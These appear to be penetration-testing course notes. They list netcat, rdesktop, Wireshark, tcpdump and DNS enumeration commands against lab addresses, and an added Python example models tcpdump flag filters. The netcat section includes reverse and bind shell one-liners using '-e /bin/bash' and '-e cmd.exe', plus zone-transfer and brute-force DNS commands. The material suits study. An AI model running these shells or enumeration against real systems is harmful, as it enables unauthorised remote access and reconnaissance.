NETCAT
→ connect to:
nc -nv 10.11.0.22 110 (-n skips DNS resolution)
→ rdp to pc
rdesktop 10.11.0.22 -u offsec -p lab -g 1024x768 -x 0x80
→ configure nc listener on a pc
nc -nvlp 4444
→ connect to the pc with nc
nc -nv 10.11.0.22 4444
→ transfer files to / create a listener on pc
nc -nvlp 4444 > incoming.exe
→ send the file from linux
locate wget.exe
nc -nv 10.11.0.22 4444 < <locate result>
→ remote administration
- from PC
nc -nlvp 4444 -e cmd.exe
- linux
nc -nv 10.11.0.22 4444
→ reverse shell
win pc
nc -nlvp 4444
linux
nc -nv 10.11.0.22 4444 -e /bin/bash
wireshark
capture filter → net 10.11.1.0/24
display filter → tcp.port == 21
tcpdump
sudo tcpdump -n -r password_cracking_filtered.pcap | awk -F " " '{print $3}' | sort | uniq -c | head
sudo tcpdump -n src host 172.16.40.10 -r password_cracking_filtered.pcap
sudo tcpdump -n dst host 172.16.40.10 -r password_cracking_filtered.pcap
sudo tcpdump -n port 81 -r password_cracking_filtered.pcap
sudo tcpdump -nX -r password_cracking_filtered.pcap | less
→ filter on the TCP flags byte: tcp[13] = 24 means PSH+ACK set, -A prints the ASCII payload so the GET requests are visible
sudo tcpdump -A -n 'tcp[13] = 24' -r password_cracking_filtered.pcap
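Added example (not part of these notes): a small Python model of what the tcpdump filters above select, run over constructed packets so it works without a pcap. It shows why 'tcp[13] = 24' means PSH and ACK set and reproduces the awk/sort/uniq count by source; 10.0.0.5 and the port numbers are made up, the awk pipeline's field 3 in real tcpdump output is address.port, here only the address is counted.

```python
import struct
from collections import Counter

PSH, ACK, SYN = 0x08, 0x10, 0x02   # bits of the TCP flags byte (tcpdump's tcp[13])

def build_packet(src, dst, sport, dport, flags):
    """Build a bare IPv4 header + TCP header (no payload, zero checksums)."""
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40, 0, 0, 64, 6, 0,
                     bytes(map(int, src.split("."))),
                     bytes(map(int, dst.split("."))))
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, flags, 8192, 0, 0)
    return ip + tcp

def parse_packet(pkt):
    """Pull out the fields the tcpdump filters above operate on."""
    ihl = (pkt[0] & 0x0F) * 4                  # IP header length in bytes
    tcp = pkt[ihl:]
    sport, dport = struct.unpack("!HH", tcp[:4])
    return {"src": ".".join(map(str, pkt[12:16])),
            "dst": ".".join(map(str, pkt[16:20])),
            "sport": sport, "dport": dport,
            "flags": tcp[13]}                  # byte 13 of the TCP header

# Constructed sample traffic (not a real capture): one client talking to port 81.
SAMPLE = [parse_packet(build_packet(*p)) for p in [
    ("172.16.40.10", "10.0.0.5", 40001, 81, SYN),
    ("10.0.0.5", "172.16.40.10", 81, 40001, SYN | ACK),
    ("172.16.40.10", "10.0.0.5", 40001, 81, ACK),
    ("172.16.40.10", "10.0.0.5", 40001, 81, PSH | ACK),   # would carry the GET
    ("10.0.0.5", "172.16.40.10", 81, 40001, PSH | ACK),   # would carry the reply
    ("172.16.40.10", "10.0.0.5", 40001, 81, ACK),
]]

def src_host(pkts, host):    # tcpdump -n src host <host>
    return [p for p in pkts if p["src"] == host]

def port(pkts, n):           # tcpdump -n port <n>  (either direction)
    return [p for p in pkts if n in (p["sport"], p["dport"])]

def psh_ack(pkts):           # tcpdump 'tcp[13] = 24': PSH (8) + ACK (16), nothing else
    return [p for p in pkts if p["flags"] == (PSH | ACK)]

def top_sources(pkts, n=3):  # ... | awk '{print $3}' | sort | uniq -c, by source address
    return Counter(p["src"] for p in pkts).most_common(n)
```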
RELEVANT TOOLS IN KALI
- DNSRECON
dnsrecon -d megacorpone.com -t axfr (to do a zone transfer)
dnsrecon -d megacorpone.com -D ~/list.txt -t brt (to do a brute force enum)
- DNSENUM
dnsenum zonetransfer.com